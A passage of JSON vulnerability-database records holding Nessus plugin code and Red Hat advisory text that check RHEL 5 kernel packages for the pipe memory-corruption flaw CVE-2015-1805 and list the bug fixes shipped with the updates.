ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-406.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-406.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:32:11", "description": "Updated kernel packages that fix one security issue and one bug are\nnow available for Red Hat Enterprise Linux 5.6 Long Life.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug :\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1214237)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 30, "published": "2015-06-26T00:00:00", "title": "RHEL 5 : kernel (RHSA-2015:1190)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "cpe:/o:redhat:enterprise_linux:5.6", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2015-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/84422", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1190. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84422);\n script_version(\"2.13\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_xref(name:\"RHSA\", value:\"2015:1190\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2015:1190)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue and one bug are\nnow available for Red Hat Enterprise Linux 5.6 Long Life.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug :\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1214237)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1805\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5\\.6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1190\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-PAE-debuginfo-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"kernel-doc-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-238.56.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-238.56.1.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:32:05", "description": "Updated kernel packages that fix one security issue and several bugs\nare now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs :\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi\ncommand timeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing.\n(BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in\nthe shrink_zone() function even though the vm.max_reclaims_in_progress\nfeature was set to 1. This update provides a patch fixing the\nunderlying source code, and spinlock contention no longer occurs in\nthis scenario. (BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from\nit, failed to reset the retransmission timestamp. As a consequence, on\ncertain connections, if a packet had to be re-transmitted, the\nretrans_stamp variable was only cleared when the next acked packet was\nreceived. This could lead to an early abortion of the TCP connection\nif this next packet also got lost. With this update, the socket clears\nretrans_stamp when the recovery is completed, thus fixing the bug.\n(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and\nthe kernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red\nHat Enterprise Linux 5 Virtual Machine (VM). With this update, the new\nsize is now reflected online immediately in a Red Hat Enterprise Linux\n5 VM so it is no longer necessary to reboot the VM to see the new disk\nsize. (BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 30, "published": "2015-06-03T00:00:00", "title": "RHEL 5 : kernel (RHSA-2015:1042)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2015-1042.NASL", "href": "https://www.tenable.com/plugins/nessus/83968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1042. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83968);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_bugtraq_id(74951);\n script_xref(name:\"RHSA\", value:\"2015:1042\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2015:1042)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue and several bugs\nare now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs :\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi\ncommand timeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing.\n(BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in\nthe shrink_zone() function even though the vm.max_reclaims_in_progress\nfeature was set to 1. This update provides a patch fixing the\nunderlying source code, and spinlock contention no longer occurs in\nthis scenario. (BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from\nit, failed to reset the retransmission timestamp. As a consequence, on\ncertain connections, if a packet had to be re-transmitted, the\nretrans_stamp variable was only cleared when the next acked packet was\nreceived. This could lead to an early abortion of the TCP connection\nif this next packet also got lost. With this update, the socket clears\nretrans_stamp when the recovery is completed, thus fixing the bug.\n(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and\nthe kernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red\nHat Enterprise Linux 5 Virtual Machine (VM). With this update, the new\nsize is now reflected online immediately in a Red Hat Enterprise Linux\n5 VM so it is no longer necessary to reboot the VM to see the new disk\nsize. (BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1805\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1042\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", 